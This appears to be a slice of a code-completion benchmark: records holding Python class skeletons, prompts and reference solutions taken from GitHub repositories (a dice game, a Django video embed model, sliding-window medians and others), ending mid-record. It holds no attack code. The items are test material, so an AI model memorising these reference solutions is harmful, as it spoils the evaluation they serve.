"346b4637a162eba17f2ab8e4d95b23b615300c4b", "skeleton": "<|skeleton|>\nclass GameController:\n\n def __init__(self):\n \"\"\"creat a PairOfDice() object, initialize the point and score value\"\"\"\n <|body_0|>\n\n def start_play(self):\n \"\"\"Start to play the game, roll the dice and get current value\"\"\"\n <|body_1|>\n\n def show_result(self):\n \"\"\"get the result based on the rules\"\"\"\n <|body_2|>\n\n def continue_game(self):\n \"\"\"didn't get the result, continue to play, compare the point with the origin_point\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class GameController:\n def __init__(self):\n \"\"\"creat a PairOfDice() object, initialize the point and score value\"\"\"\n self.pair = PairOfDice()\n self.point = None\n self.origin_point = None\n\n def start_play(self):\n \"\"\"Start to play the game, roll the dice and get current value\"\"\"\n input('Please enter to roll the dice...\\n')\n self.pair.roll_dice()\n self.point = self.pair.current_value()\n\n def show_result(self):\n \"\"\"get the result based on the rules\"\"\"\n WIN_POINTS = [7, 11]\n LOSE_POINTS = [2, 3, 12]\n if self.point in LOSE_POINTS:\n print('You rolled {}. You lose.'.format(self.point))\n elif self.point in WIN_POINTS:\n print('You rolled {}. You win.'.format(self.point))\n else:\n print('You point is {}'.format(self.point))\n self.origin_point = self.point\n self.continue_game()\n\n def continue_game(self):\n \"\"\"didn't get the result, continue to play, compare the point with the origin_point\"\"\"\n LOSE_POINT = 7\n self.start_play()\n while self.point != self.origin_point and self.point != LOSE_POINT:\n print('You rolled {}.'.format(self.point))\n self.start_play()\n else:\n if self.point == self.origin_point:\n print('You rolled {}. You win.'.format(self.point))\n else:\n print('You rolled {}. You lose.'.format(self.point))\n", "source": "the_stack_v2_python_sparse", "source_path": "lab07/game_controller.py", "source_repo": "jingjingliao/PythonCourse_5001", "split": "test", "star_events_count": 0} {"blob_id": "03d529ce12700fdafae2f792bb8b44968fe53cab", "bodies": ["embed_url = None\nyoutube_embed_url = 'https://www.youtube.com/embed/{}'\nvimeo_embed_url = 'https://player.vimeo.com/video/{}'\nif re.match(YOUTUBE_URL_RE, self.url):\n embed_url = youtube_embed_url.format(re.match(YOUTUBE_URL_RE, self.url).group(2))\nif re.match(VIMEO_URL_RE, self.url):\n embed_url = vimeo_embed_url.format(re.match(VIMEO_URL_RE, self.url).group(3))\nreturn embed_url", "if self.url:\n iframe_html = ''\n self.html = iframe_html.format(self.get_embed_url(), self.title)\nreturn super().save(force_insert, force_update, using, update_fields)"], "bodies_text": "<|body_start_0|>\n embed_url = None\n youtube_embed_url = 'https://www.youtube.com/embed/{}'\n vimeo_embed_url = 'https://player.vimeo.com/video/{}'\n if re.match(YOUTUBE_URL_RE, self.url):\n embed_url = youtube_embed_url.format(re.match(YOUTUBE_URL_RE, self.url).group(2))\n if re.match(VIMEO_URL_RE, self.url):\n embed_url = vimeo_embed_url.format(re.match(VIMEO_URL_RE, self.url).group(3))\n return embed_url\n<|end_body_0|>\n\n<|body_start_1|>\n if self.url:\n iframe_html = ''\n self.html = iframe_html.format(self.get_embed_url(), self.title)\n return super().save(force_insert, force_update, using, update_fields)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Video", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Video:\n\n def get_embed_url(self):\n \"\"\"Get correct embed url for Youtube or Vimeo.\"\"\"\n <|body_0|>\n\n def save(self, force_insert=False, force_update=False, using=None, update_fields=None):\n \"\"\"Set html field with correct iframe.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n embed_url = None\n youtube_embed_url = 'https://www.youtube.com/embed/{}'\n vimeo_embed_url = 'https://player.vimeo.com/video/{}'\n if re.match(YOUTUBE_URL_RE, self.url):\n embed_url = youtube_embed_url.format(re.match(YOUTUBE_URL_RE, self.url).group(2))\n if re.match(VIMEO_URL_RE, self.url):\n embed_url = vimeo_embed_url.format(re.match(VIMEO_URL_RE, self.url).group(3))\n return embed_url\n<|end_body_0|>\n\n<|body_start_1|>\n if self.url:\n iframe_html = ''\n self.html = iframe_html.format(self.get_embed_url(), self.title)\n return super().save(force_insert, force_update, using, update_fields)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000341", "length_bytes": 1528, "license_type": "permissive", "methods": [{"docstring": "Get correct embed url for Youtube or Vimeo.", "name": "get_embed_url", "signature": "def get_embed_url(self)"}, {"docstring": "Set html field with correct iframe.", "name": "save", "signature": "def save(self, force_insert=False, force_update=False, using=None, update_fields=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_007277", "prompt": "Implement the Python class `Video` described below.\n\nClass description:\nImplement the Video class.\n\nMethod signatures and docstrings:\n- def get_embed_url(self): Get correct embed url for Youtube or Vimeo.\n- def save(self, force_insert=False, force_update=False, using=None, update_fields=None): Set html field with correct iframe.", "prompted_full_text": "Implement the Python class `Video` described below.\n\nClass description:\nImplement the Video class.\n\nMethod signatures and docstrings:\n- def get_embed_url(self): Get correct embed url for Youtube or Vimeo.\n- def save(self, force_insert=False, force_update=False, using=None, update_fields=None): Set html field with correct iframe.\n\n<|skeleton|>\nclass Video:\n\n def get_embed_url(self):\n \"\"\"Get correct embed url for Youtube or Vimeo.\"\"\"\n <|body_0|>\n\n def save(self, force_insert=False, force_update=False, using=None, update_fields=None):\n \"\"\"Set html field with correct iframe.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n embed_url = None\n youtube_embed_url = 'https://www.youtube.com/embed/{}'\n vimeo_embed_url = 'https://player.vimeo.com/video/{}'\n if re.match(YOUTUBE_URL_RE, self.url):\n embed_url = youtube_embed_url.format(re.match(YOUTUBE_URL_RE, self.url).group(2))\n if re.match(VIMEO_URL_RE, self.url):\n embed_url = vimeo_embed_url.format(re.match(VIMEO_URL_RE, self.url).group(3))\n return embed_url\n<|end_body_0|>\n\n<|body_start_1|>\n if self.url:\n iframe_html = ''\n self.html = iframe_html.format(self.get_embed_url(), self.title)\n return super().save(force_insert, force_update, using, update_fields)\n<|end_body_1|>\n", "revision_id": "b9b0a3d8b49d5d9b840656f84564ba0a6e016f98", "skeleton": "<|skeleton|>\nclass Video:\n\n def get_embed_url(self):\n \"\"\"Get correct embed url for Youtube or Vimeo.\"\"\"\n <|body_0|>\n\n def save(self, force_insert=False, force_update=False, using=None, update_fields=None):\n \"\"\"Set html field with correct iframe.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Video:\n def get_embed_url(self):\n \"\"\"Get correct embed url for Youtube or Vimeo.\"\"\"\n embed_url = None\n youtube_embed_url = 'https://www.youtube.com/embed/{}'\n vimeo_embed_url = 'https://player.vimeo.com/video/{}'\n if re.match(YOUTUBE_URL_RE, self.url):\n embed_url = youtube_embed_url.format(re.match(YOUTUBE_URL_RE, self.url).group(2))\n if re.match(VIMEO_URL_RE, self.url):\n embed_url = vimeo_embed_url.format(re.match(VIMEO_URL_RE, self.url).group(3))\n return embed_url\n\n def save(self, force_insert=False, force_update=False, using=None, update_fields=None):\n \"\"\"Set html field with correct iframe.\"\"\"\n if self.url:\n iframe_html = ''\n self.html = iframe_html.format(self.get_embed_url(), self.title)\n return super().save(force_insert, force_update, using, update_fields)\n", "source": "the_stack_v2_python_sparse", "source_path": "glitter/blocks/video/models.py", "source_repo": "developersociety/django-glitter", "split": "test", "star_events_count": 3} {"blob_id": "eedf072f38a5bd0cf24c5bde2febdee1785981fa", "bodies": ["self._disable_patching = True\nself._validate_base(self)\nself._disable_patching = False", "self._validate()\nresult = method(*args, **kwargs)\nself._validate()\nreturn result", "attr = super().__getattribute__(name)\nif name in ('_patched_method', '_validate', '_validate_base', '_disable_patching'):\n return attr\nif self._disable_patching:\n return attr\nif not isinstance(attr, MethodType):\n return attr\npatched_method = partial(self._patched_method, attr)\nreturn update_wrapper(patched_method, attr)", "super().__setattr__(name, value)\nif name == '_disable_patching':\n return\nself._validate()"], "bodies_text": "<|body_start_0|>\n self._disable_patching = True\n self._validate_base(self)\n self._disable_patching = False\n<|end_body_0|>\n\n<|body_start_1|>\n self._validate()\n result = method(*args, **kwargs)\n self._validate()\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n attr = super().__getattribute__(name)\n if name in ('_patched_method', '_validate', '_validate_base', '_disable_patching'):\n return attr\n if self._disable_patching:\n return attr\n if not isinstance(attr, MethodType):\n return attr\n patched_method = partial(self._patched_method, attr)\n return update_wrapper(patched_method, attr)\n<|end_body_2|>\n\n<|body_start_3|>\n super().__setattr__(name, value)\n if name == '_disable_patching':\n return\n self._validate()\n<|end_body_3|>\n", "class_docstring": "", "class_name": "InvariantedClass", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass InvariantedClass:\n\n def _validate(self) -> None:\n \"\"\"Step 5 (1st flow) or Step 4 (2nd flow). Process contract for object.\"\"\"\n <|body_0|>\n\n def _patched_method(self, method: Callable, *args, **kwargs):\n \"\"\"Step 4 (1st flow). Call method\"\"\"\n <|body_1|>\n\n def __getattribute__(self, name: str):\n \"\"\"Step 3 (1st flow). Get method\"\"\"\n <|body_2|>\n\n def __setattr__(self, name: str, value):\n \"\"\"Step 3 (2nd flow). Set some attribute\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._disable_patching = True\n self._validate_base(self)\n self._disable_patching = False\n<|end_body_0|>\n\n<|body_start_1|>\n self._validate()\n result = method(*args, **kwargs)\n self._validate()\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n attr = super().__getattribute__(name)\n if name in ('_patched_method', '_validate', '_validate_base', '_disable_patching'):\n return attr\n if self._disable_patching:\n return attr\n if not isinstance(attr, MethodType):\n return attr\n patched_method = partial(self._patched_method, attr)\n return update_wrapper(patched_method, attr)\n<|end_body_2|>\n\n<|body_start_3|>\n super().__setattr__(name, value)\n if name == '_disable_patching':\n return\n self._validate()\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000342", "length_bytes": 3490, "license_type": "permissive", "methods": [{"docstring": "Step 5 (1st flow) or Step 4 (2nd flow). Process contract for object.", "name": "_validate", "signature": "def _validate(self) -> None"}, {"docstring": "Step 4 (1st flow). Call method", "name": "_patched_method", "signature": "def _patched_method(self, method: Callable, *args, **kwargs)"}, {"docstring": "Step 3 (1st flow). Get method", "name": "__getattribute__", "signature": "def __getattribute__(self, name: str)"}, {"docstring": "Step 3 (2nd flow). Set some attribute", "name": "__setattr__", "signature": "def __setattr__(self, name: str, value)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_003891", "prompt": "Implement the Python class `InvariantedClass` described below.\n\nClass description:\nImplement the InvariantedClass class.\n\nMethod signatures and docstrings:\n- def _validate(self) -> None: Step 5 (1st flow) or Step 4 (2nd flow). Process contract for object.\n- def _patched_method(self, method: Callable, *args, **kwargs): Step 4 (1st flow). Call method\n- def __getattribute__(self, name: str): Step 3 (1st flow). Get method\n- def __setattr__(self, name: str, value): Step 3 (2nd flow). Set some attribute", "prompted_full_text": "Implement the Python class `InvariantedClass` described below.\n\nClass description:\nImplement the InvariantedClass class.\n\nMethod signatures and docstrings:\n- def _validate(self) -> None: Step 5 (1st flow) or Step 4 (2nd flow). Process contract for object.\n- def _patched_method(self, method: Callable, *args, **kwargs): Step 4 (1st flow). Call method\n- def __getattribute__(self, name: str): Step 3 (1st flow). Get method\n- def __setattr__(self, name: str, value): Step 3 (2nd flow). Set some attribute\n\n<|skeleton|>\nclass InvariantedClass:\n\n def _validate(self) -> None:\n \"\"\"Step 5 (1st flow) or Step 4 (2nd flow). Process contract for object.\"\"\"\n <|body_0|>\n\n def _patched_method(self, method: Callable, *args, **kwargs):\n \"\"\"Step 4 (1st flow). Call method\"\"\"\n <|body_1|>\n\n def __getattribute__(self, name: str):\n \"\"\"Step 3 (1st flow). Get method\"\"\"\n <|body_2|>\n\n def __setattr__(self, name: str, value):\n \"\"\"Step 3 (2nd flow). Set some attribute\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._disable_patching = True\n self._validate_base(self)\n self._disable_patching = False\n<|end_body_0|>\n\n<|body_start_1|>\n self._validate()\n result = method(*args, **kwargs)\n self._validate()\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n attr = super().__getattribute__(name)\n if name in ('_patched_method', '_validate', '_validate_base', '_disable_patching'):\n return attr\n if self._disable_patching:\n return attr\n if not isinstance(attr, MethodType):\n return attr\n patched_method = partial(self._patched_method, attr)\n return update_wrapper(patched_method, attr)\n<|end_body_2|>\n\n<|body_start_3|>\n super().__setattr__(name, value)\n if name == '_disable_patching':\n return\n self._validate()\n<|end_body_3|>\n", "revision_id": "9dff86e1dc5c8607f02ded34b6d64e770f1959fa", "skeleton": "<|skeleton|>\nclass InvariantedClass:\n\n def _validate(self) -> None:\n \"\"\"Step 5 (1st flow) or Step 4 (2nd flow). Process contract for object.\"\"\"\n <|body_0|>\n\n def _patched_method(self, method: Callable, *args, **kwargs):\n \"\"\"Step 4 (1st flow). Call method\"\"\"\n <|body_1|>\n\n def __getattribute__(self, name: str):\n \"\"\"Step 3 (1st flow). Get method\"\"\"\n <|body_2|>\n\n def __setattr__(self, name: str, value):\n \"\"\"Step 3 (2nd flow). Set some attribute\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class InvariantedClass:\n def _validate(self) -> None:\n \"\"\"Step 5 (1st flow) or Step 4 (2nd flow). Process contract for object.\"\"\"\n self._disable_patching = True\n self._validate_base(self)\n self._disable_patching = False\n\n def _patched_method(self, method: Callable, *args, **kwargs):\n \"\"\"Step 4 (1st flow). Call method\"\"\"\n self._validate()\n result = method(*args, **kwargs)\n self._validate()\n return result\n\n def __getattribute__(self, name: str):\n \"\"\"Step 3 (1st flow). Get method\"\"\"\n attr = super().__getattribute__(name)\n if name in ('_patched_method', '_validate', '_validate_base', '_disable_patching'):\n return attr\n if self._disable_patching:\n return attr\n if not isinstance(attr, MethodType):\n return attr\n patched_method = partial(self._patched_method, attr)\n return update_wrapper(patched_method, attr)\n\n def __setattr__(self, name: str, value):\n \"\"\"Step 3 (2nd flow). Set some attribute\"\"\"\n super().__setattr__(name, value)\n if name == '_disable_patching':\n return\n self._validate()\n", "source": "the_stack_v2_python_sparse", "source_path": "deal/_decorators/inv.py", "source_repo": "toonarmycaptain/deal", "split": "test", "star_events_count": 0} {"blob_id": "5cbab5ca770c8631b498657df7fe93be80e8b008", "bodies": ["if len(nums) < 1:\n return []\nret = []\ndh = DualHeap()\nfor i in xrange(k):\n dh.add(nums[i])\nret.append(dh.median())\nfor i in xrange(k, len(nums)):\n dh.remove(nums[i - k])\n dh.add(nums[i])\n ret.append(dh.median())\nreturn ret", "if len(nums) < 1:\n return []\npq = PriorityQueue()\nfor i in xrange(k):\n pq.insert(nums[i])\nret = []\nmid = k / 2\nif k % 2 == 0:\n mid -= 1\nret.append(pq[mid])\nfor i in xrange(k, len(nums)):\n pq.remove(nums[i - k])\n pq.insert(nums[i])\n ret.append(pq[mid])\nreturn ret"], "bodies_text": "<|body_start_0|>\n if len(nums) < 1:\n return []\n ret = []\n dh = DualHeap()\n for i in xrange(k):\n dh.add(nums[i])\n ret.append(dh.median())\n for i in xrange(k, len(nums)):\n dh.remove(nums[i - k])\n dh.add(nums[i])\n ret.append(dh.median())\n return ret\n<|end_body_0|>\n\n<|body_start_1|>\n if len(nums) < 1:\n return []\n pq = PriorityQueue()\n for i in xrange(k):\n pq.insert(nums[i])\n ret = []\n mid = k / 2\n if k % 2 == 0:\n mid -= 1\n ret.append(pq[mid])\n for i in xrange(k, len(nums)):\n pq.remove(nums[i - k])\n pq.insert(nums[i])\n ret.append(pq[mid])\n return ret\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def medianSlidingWindow(self, nums, k):\n \"\"\"Use heap\"\"\"\n <|body_0|>\n\n def medianSlidingWindow_TLE(self, nums, k):\n \"\"\"Use priority queue :param nums: A list of integers. :param k: size of window :return: The median of element inside the window at each moving.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if len(nums) < 1:\n return []\n ret = []\n dh = DualHeap()\n for i in xrange(k):\n dh.add(nums[i])\n ret.append(dh.median())\n for i in xrange(k, len(nums)):\n dh.remove(nums[i - k])\n dh.add(nums[i])\n ret.append(dh.median())\n return ret\n<|end_body_0|>\n\n<|body_start_1|>\n if len(nums) < 1:\n return []\n pq = PriorityQueue()\n for i in xrange(k):\n pq.insert(nums[i])\n ret = []\n mid = k / 2\n if k % 2 == 0:\n mid -= 1\n ret.append(pq[mid])\n for i in xrange(k, len(nums)):\n pq.remove(nums[i - k])\n pq.insert(nums[i])\n ret.append(pq[mid])\n return ret\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000343", "length_bytes": 4918, "license_type": "permissive", "methods": [{"docstring": "Use heap", "name": "medianSlidingWindow", "signature": "def medianSlidingWindow(self, nums, k)"}, {"docstring": "Use priority queue :param nums: A list of integers. :param k: size of window :return: The median of element inside the window at each moving.", "name": "medianSlidingWindow_TLE", "signature": "def medianSlidingWindow_TLE(self, nums, k)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005968", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def medianSlidingWindow(self, nums, k): Use heap\n- def medianSlidingWindow_TLE(self, nums, k): Use priority queue :param nums: A list of integers. :param k: size of window :return: The median of element inside the window at each moving.", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def medianSlidingWindow(self, nums, k): Use heap\n- def medianSlidingWindow_TLE(self, nums, k): Use priority queue :param nums: A list of integers. :param k: size of window :return: The median of element inside the window at each moving.\n\n<|skeleton|>\nclass Solution:\n\n def medianSlidingWindow(self, nums, k):\n \"\"\"Use heap\"\"\"\n <|body_0|>\n\n def medianSlidingWindow_TLE(self, nums, k):\n \"\"\"Use priority queue :param nums: A list of integers. :param k: size of window :return: The median of element inside the window at each moving.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if len(nums) < 1:\n return []\n ret = []\n dh = DualHeap()\n for i in xrange(k):\n dh.add(nums[i])\n ret.append(dh.median())\n for i in xrange(k, len(nums)):\n dh.remove(nums[i - k])\n dh.add(nums[i])\n ret.append(dh.median())\n return ret\n<|end_body_0|>\n\n<|body_start_1|>\n if len(nums) < 1:\n return []\n pq = PriorityQueue()\n for i in xrange(k):\n pq.insert(nums[i])\n ret = []\n mid = k / 2\n if k % 2 == 0:\n mid -= 1\n ret.append(pq[mid])\n for i in xrange(k, len(nums)):\n pq.remove(nums[i - k])\n pq.insert(nums[i])\n ret.append(pq[mid])\n return ret\n<|end_body_1|>\n", "revision_id": "4629a3857b2c57418b86a3b3a7180ecb15e763e3", "skeleton": "<|skeleton|>\nclass Solution:\n\n def medianSlidingWindow(self, nums, k):\n \"\"\"Use heap\"\"\"\n <|body_0|>\n\n def medianSlidingWindow_TLE(self, nums, k):\n \"\"\"Use priority queue :param nums: A list of integers. :param k: size of window :return: The median of element inside the window at each moving.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def medianSlidingWindow(self, nums, k):\n \"\"\"Use heap\"\"\"\n if len(nums) < 1:\n return []\n ret = []\n dh = DualHeap()\n for i in xrange(k):\n dh.add(nums[i])\n ret.append(dh.median())\n for i in xrange(k, len(nums)):\n dh.remove(nums[i - k])\n dh.add(nums[i])\n ret.append(dh.median())\n return ret\n\n def medianSlidingWindow_TLE(self, nums, k):\n \"\"\"Use priority queue :param nums: A list of integers. :param k: size of window :return: The median of element inside the window at each moving.\"\"\"\n if len(nums) < 1:\n return []\n pq = PriorityQueue()\n for i in xrange(k):\n pq.insert(nums[i])\n ret = []\n mid = k / 2\n if k % 2 == 0:\n mid -= 1\n ret.append(pq[mid])\n for i in xrange(k, len(nums)):\n pq.remove(nums[i - k])\n pq.insert(nums[i])\n ret.append(pq[mid])\n return ret\n", "source": "the_stack_v2_python_sparse", "source_path": "archive/Sliding Window Median TLE.py", "source_repo": "RijuDasgupta9116/LintCode", "split": "test", "star_events_count": 0} {"blob_id": "d79ca176120b15bade280614c6e7c4ad53b962f7", "bodies": ["self.leader = leader\nself.movement = movement\nself.time_stamp = datetime.now()\nself.message = message", "signal_dict = {'time_stamp': str(self.time_stamp.astimezone())}\nif self.message:\n signal_dict['message'] = self.message\nreturn signal_dict"], "bodies_text": "<|body_start_0|>\n self.leader = leader\n self.movement = movement\n self.time_stamp = datetime.now()\n self.message = message\n<|end_body_0|>\n\n<|body_start_1|>\n signal_dict = {'time_stamp': str(self.time_stamp.astimezone())}\n if self.message:\n signal_dict['message'] = self.message\n return signal_dict\n<|end_body_1|>\n", "class_docstring": "Representation of signals in the database. :attribute leader: The leader that created this signal. :attribute movement: The movement that this signal was created in. :attribute message: Message from the leader.", "class_name": "Signal", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Signal:\n \"\"\"Representation of signals in the database. :attribute leader: The leader that created this signal. :attribute movement: The movement that this signal was created in. :attribute message: Message from the leader.\"\"\"\n\n def __init__(self, leader, movement, message=None):\n \"\"\"Construct a new signal.\"\"\"\n <|body_0|>\n\n def to_json(self):\n \"\"\"Get the json representation of the signal.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.leader = leader\n self.movement = movement\n self.time_stamp = datetime.now()\n self.message = message\n<|end_body_0|>\n\n<|body_start_1|>\n signal_dict = {'time_stamp': str(self.time_stamp.astimezone())}\n if self.message:\n signal_dict['message'] = self.message\n return signal_dict\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000344", "length_bytes": 1347, "license_type": "no_license", "methods": [{"docstring": "Construct a new signal.", "name": "__init__", "signature": "def __init__(self, leader, movement, message=None)"}, {"docstring": "Get the json representation of the signal.", "name": "to_json", "signature": "def to_json(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006731", "prompt": "Implement the Python class `Signal` described below.\n\nClass description:\nRepresentation of signals in the database. :attribute leader: The leader that created this signal. :attribute movement: The movement that this signal was created in. :attribute message: Message from the leader.\n\nMethod signatures and docstrings:\n- def __init__(self, leader, movement, message=None): Construct a new signal.\n- def to_json(self): Get the json representation of the signal.", "prompted_full_text": "Implement the Python class `Signal` described below.\n\nClass description:\nRepresentation of signals in the database. :attribute leader: The leader that created this signal. :attribute movement: The movement that this signal was created in. :attribute message: Message from the leader.\n\nMethod signatures and docstrings:\n- def __init__(self, leader, movement, message=None): Construct a new signal.\n- def to_json(self): Get the json representation of the signal.\n\n<|skeleton|>\nclass Signal:\n \"\"\"Representation of signals in the database. :attribute leader: The leader that created this signal. :attribute movement: The movement that this signal was created in. :attribute message: Message from the leader.\"\"\"\n\n def __init__(self, leader, movement, message=None):\n \"\"\"Construct a new signal.\"\"\"\n <|body_0|>\n\n def to_json(self):\n \"\"\"Get the json representation of the signal.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.leader = leader\n self.movement = movement\n self.time_stamp = datetime.now()\n self.message = message\n<|end_body_0|>\n\n<|body_start_1|>\n signal_dict = {'time_stamp': str(self.time_stamp.astimezone())}\n if self.message:\n signal_dict['message'] = self.message\n return signal_dict\n<|end_body_1|>\n", "revision_id": "970f5555b398a42fcb47782f2edbbbba413f3c3e", "skeleton": "<|skeleton|>\nclass Signal:\n \"\"\"Representation of signals in the database. :attribute leader: The leader that created this signal. :attribute movement: The movement that this signal was created in. :attribute message: Message from the leader.\"\"\"\n\n def __init__(self, leader, movement, message=None):\n \"\"\"Construct a new signal.\"\"\"\n <|body_0|>\n\n def to_json(self):\n \"\"\"Get the json representation of the signal.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Signal:\n \"\"\"Representation of signals in the database. :attribute leader: The leader that created this signal. :attribute movement: The movement that this signal was created in. :attribute message: Message from the leader.\"\"\"\n\n def __init__(self, leader, movement, message=None):\n \"\"\"Construct a new signal.\"\"\"\n self.leader = leader\n self.movement = movement\n self.time_stamp = datetime.now()\n self.message = message\n\n def to_json(self):\n \"\"\"Get the json representation of the signal.\"\"\"\n signal_dict = {'time_stamp': str(self.time_stamp.astimezone())}\n if self.message:\n signal_dict['message'] = self.message\n return signal_dict\n", "source": "the_stack_v2_python_sparse", "source_path": "gridt/models/signal.py", "source_repo": "GridtNetwork/gridtlib", "split": "test", "star_events_count": 0} {"blob_id": "423330e2069b955723084dcd464c1bfe545eedf3", "bodies": ["length = len(nums)\nstore = [0] * length\nfor num in nums:\n store[num] += 1\n if store[num] >= 2:\n return num\nreturn -1", "find_dict = dict()\nfor num in nums:\n if num in find_dict:\n return num\n else:\n find_dict[num] = 0", "find_set = set()\nfor num in nums:\n if num in find_set:\n return num\n else:\n find_set.add(num)"], "bodies_text": "<|body_start_0|>\n length = len(nums)\n store = [0] * length\n for num in nums:\n store[num] += 1\n if store[num] >= 2:\n return num\n return -1\n<|end_body_0|>\n\n<|body_start_1|>\n find_dict = dict()\n for num in nums:\n if num in find_dict:\n return num\n else:\n find_dict[num] = 0\n<|end_body_1|>\n\n<|body_start_2|>\n find_set = set()\n for num in nums:\n if num in find_set:\n return num\n else:\n find_set.add(num)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def findRepeatNumber(self, nums: List[int]) -> int:\n \"\"\"第一种方法 维持一个数组,a[n] 位置保存对应的数的个数 空间上有些浪费\"\"\"\n <|body_0|>\n\n def findRepeatNumber2(self, nums: List[int]) -> int:\n \"\"\"第二种方法 把方法一中的数组换成字典来存储,不需要初始化空间,查找也是O(1)\"\"\"\n <|body_1|>\n\n def findRepeatNumber2_2(self, nums: List[int]) -> int:\n \"\"\"第二种的改版 字典用set来存储\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n length = len(nums)\n store = [0] * length\n for num in nums:\n store[num] += 1\n if store[num] >= 2:\n return num\n return -1\n<|end_body_0|>\n\n<|body_start_1|>\n find_dict = dict()\n for num in nums:\n if num in find_dict:\n return num\n else:\n find_dict[num] = 0\n<|end_body_1|>\n\n<|body_start_2|>\n find_set = set()\n for num in nums:\n if num in find_set:\n return num\n else:\n find_set.add(num)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000345", "length_bytes": 1945, "license_type": "no_license", "methods": [{"docstring": "第一种方法 维持一个数组,a[n] 位置保存对应的数的个数 空间上有些浪费", "name": "findRepeatNumber", "signature": "def findRepeatNumber(self, nums: List[int]) -> int"}, {"docstring": "第二种方法 把方法一中的数组换成字典来存储,不需要初始化空间,查找也是O(1)", "name": "findRepeatNumber2", "signature": "def findRepeatNumber2(self, nums: List[int]) -> int"}, {"docstring": "第二种的改版 字典用set来存储", "name": "findRepeatNumber2_2", "signature": "def findRepeatNumber2_2(self, nums: List[int]) -> int"}], "n_methods": 3, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findRepeatNumber(self, nums: List[int]) -> int: 第一种方法 维持一个数组,a[n] 位置保存对应的数的个数 空间上有些浪费\n- def findRepeatNumber2(self, nums: List[int]) -> int: 第二种方法 把方法一中的数组换成字典来存储,不需要初始化空间,查找也是O(1)\n- def findRepeatNumber2_2(self, nums: List[int]) -> int: 第二种的改版 字典用set来存储", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findRepeatNumber(self, nums: List[int]) -> int: 第一种方法 维持一个数组,a[n] 位置保存对应的数的个数 空间上有些浪费\n- def findRepeatNumber2(self, nums: List[int]) -> int: 第二种方法 把方法一中的数组换成字典来存储,不需要初始化空间,查找也是O(1)\n- def findRepeatNumber2_2(self, nums: List[int]) -> int: 第二种的改版 字典用set来存储\n\n<|skeleton|>\nclass Solution:\n\n def findRepeatNumber(self, nums: List[int]) -> int:\n \"\"\"第一种方法 维持一个数组,a[n] 位置保存对应的数的个数 空间上有些浪费\"\"\"\n <|body_0|>\n\n def findRepeatNumber2(self, nums: List[int]) -> int:\n \"\"\"第二种方法 把方法一中的数组换成字典来存储,不需要初始化空间,查找也是O(1)\"\"\"\n <|body_1|>\n\n def findRepeatNumber2_2(self, nums: List[int]) -> int:\n \"\"\"第二种的改版 字典用set来存储\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n length = len(nums)\n store = [0] * length\n for num in nums:\n store[num] += 1\n if store[num] >= 2:\n return num\n return -1\n<|end_body_0|>\n\n<|body_start_1|>\n find_dict = dict()\n for num in nums:\n if num in find_dict:\n return num\n else:\n find_dict[num] = 0\n<|end_body_1|>\n\n<|body_start_2|>\n find_set = set()\n for num 